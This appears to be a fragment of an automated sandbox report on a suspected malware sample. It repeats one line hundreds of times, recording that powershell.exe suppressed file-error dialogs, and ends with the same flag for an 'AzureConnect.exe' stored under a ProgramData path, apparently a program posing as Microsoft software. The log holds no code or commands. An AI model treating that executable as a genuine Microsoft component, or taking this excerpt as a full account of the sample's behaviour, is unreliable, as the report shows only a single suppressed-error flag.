            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
